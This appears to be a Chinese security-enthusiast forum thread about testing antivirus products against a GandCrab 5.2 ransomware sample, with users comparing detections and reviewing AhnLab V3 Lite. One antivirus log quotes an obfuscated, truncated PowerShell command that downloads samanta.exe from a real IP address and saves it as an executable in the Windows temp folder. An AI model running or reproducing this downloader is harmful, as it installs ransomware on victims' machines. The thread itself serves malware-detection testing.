GandCrab 5.2 (19.03.13)

欧阳宣

eset

Win32/GenKryptik.DCIL

海洋饼干

avast 干掉了doc，但是忽略了exe 什么情况

Miostartos

191196846 发表于 2019-3-13 11:32
AhnLab V3 Lite
Behavior Block

哪搞到的，我也想玩。

Jerry.Lin

STCn1000 发表于 2019-3-13 15:41
哪搞到的，我也想玩。

https://www.ahnlab.com/kr/site/product/productView.do?prodSeq=8

免费了

Miostartos

191196846 发表于 2019-3-13 15:47
https://www.ahnlab.com/kr/site/product/productView.do?prodSeq=8

免费了

nice。
收下了。lite好像一直是免费的，只有AIS不是。

vm001

www-tekeze 发表于 2019-3-13 11:42
智量清空，火绒kill 1X，miss .exe，有空双击。。

【1】2019-03-13 15:58:28,病毒防御,恶意行为监控,发现未知病毒BEHAV:Ransom/Rattrap.A, 已清除

病毒名称：BEHAV:Ransom/Rattrap.A
文件路径：C:\Users\Admin\Desktop\GandCrab5.213\samanta.exe
用户操作：已清除

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【2】2019-03-13 15:56:50,病毒防御,恶意行为监控,发现未知病毒BEHAV:Ransom/Rattrap.A, 已清除

病毒名称：BEHAV:Ransom/Rattrap.A
文件路径：C:\windows\temp\191.exe
用户操作：已清除

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【3】2019-03-13 15:56:34,系统防御,自定义防护,cmd.exe触犯自定义文件防护规则, 已允许

操作者：C:\windows\SysWOW64\cmd.exe
命令行：c:\windows\system32\cmd /c set p=power&& set s=shell&& call %p%%s% $RAZY83lq = '$zDTzYNWK8 = new-obj-122533090-465901954-1104848796ect -com-122533090-465901954-1104848796obj-122533090-465901954-1104848796ect wsc-122533090-465901954-1104848796ript.she-122533090-465901954-1104848796ll;$qWGZblF = new-object sys-122533090-465901954-1104848796tem.net.web-122533090-465901954-1104848796client;$gNR1Y = new-object random;$YJ5WjlFc = \"-122533090-465901954-1104848796h-122533090-465901954-1104848796t-122533090-465901954-1104848796t-122533090-465901954-1104848796p-122533090-465901954-1104848796://205.185.125.109/samanta.exe\".spl-122533090-465901954-1104848796it(\",\");$SND7j = $gNR1Y.nex-122533090-465901954-1104848796t(1, 65536);$vPw8tqgia = \"c:\win-122533090-465901954-1104848796dows\tem-122533090-465901954-1104848796p\191.ex-122533090-465901954-1104848796e\";for-122533090-465901954-1104848796each($mFtaPgz in $YJ5WjlFc){try{$qWGZblF.dow-122533090-465901954-1104848796nlo-122533090-465901954-1104848796adf-122533090-4659
触犯规则：阻止CMD风险操作
操作类型：执行
操作文件：C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
用户操作：已允许

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【4】2019-03-13 15:56:00,系统防御,自定义防护,cmd.exe触犯自定义文件防护规则, 已阻止

操作者：C:\windows\SysWOW64\cmd.exe
命令行：c:\windows\system32\cmd /c set p=power&& set s=shell&& call %p%%s% $RAZY83lq = '$zDTzYNWK8 = new-obj-122533090-465901954-1104848796ect -com-122533090-465901954-1104848796obj-122533090-465901954-1104848796ect wsc-122533090-465901954-1104848796ript.she-122533090-465901954-1104848796ll;$qWGZblF = new-object sys-122533090-465901954-1104848796tem.net.web-122533090-465901954-1104848796client;$gNR1Y = new-object random;$YJ5WjlFc = \"-122533090-465901954-1104848796h-122533090-465901954-1104848796t-122533090-465901954-1104848796t-122533090-465901954-1104848796p-122533090-465901954-1104848796://205.185.125.109/samanta.exe\".spl-122533090-465901954-1104848796it(\",\");$SND7j = $gNR1Y.nex-122533090-465901954-1104848796t(1, 65536);$vPw8tqgia = \"c:\win-122533090-465901954-1104848796dows\tem-122533090-465901954-1104848796p\191.ex-122533090-465901954-1104848796e\";for-122533090-465901954-1104848796each($mFtaPgz in $YJ5WjlFc){try{$qWGZblF.dow-122533090-465901954-1104848796nlo-122533090-465901954-1104848796adf-122533090-4659
触犯规则：阻止CMD风险操作
操作类型：执行
操作文件：C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
用户操作：已阻止

ziyerain2015

景云MISS

Miostartos

191196846 发表于 2019-3-13 15:47
https://www.ahnlab.com/kr/site/product/productView.do?prodSeq=8

免费了

试了一下，这也太奇葩了。
全是英文里面夹着几个中文。棒子在搞什么。
而且这个版本明明似乎只在棒子官网提供，装上却是英文，还看不到在哪调整语言。

Jerry.Lin

STCn1000 发表于 2019-3-13 16:41
试了一下，这也太奇葩了。
全是英文里面夹着几个中文。棒子在搞什么。
而且这个版本明明似乎只 ...

疗效还行，有多步，不过极其依赖云

特征很烂，本地库大概100M+，从报毒名看，都是抄的，少部分非PE检测还行

就是那个UI我还挺喜欢的

Miostartos

191196846 发表于 2019-3-13 16:43
疗效还行，有多步，不过极其依赖云

特征很烂，本地库大概100M+，从报毒名看，都是抄的，少部分非PE检 ...

AIS8.0之前那弱的不要不要的，和没融合HMPA的sophos有得一拼。8.0之后IS版看AVC测试还凑合。
报毒全是抄的那估计又是个VT算法选手，没意思，哈哈哈。
界面确实挺好看。最好玩的是右键那个分析报告，我这里报错打不开，仔细一看居然是调用IE的网页。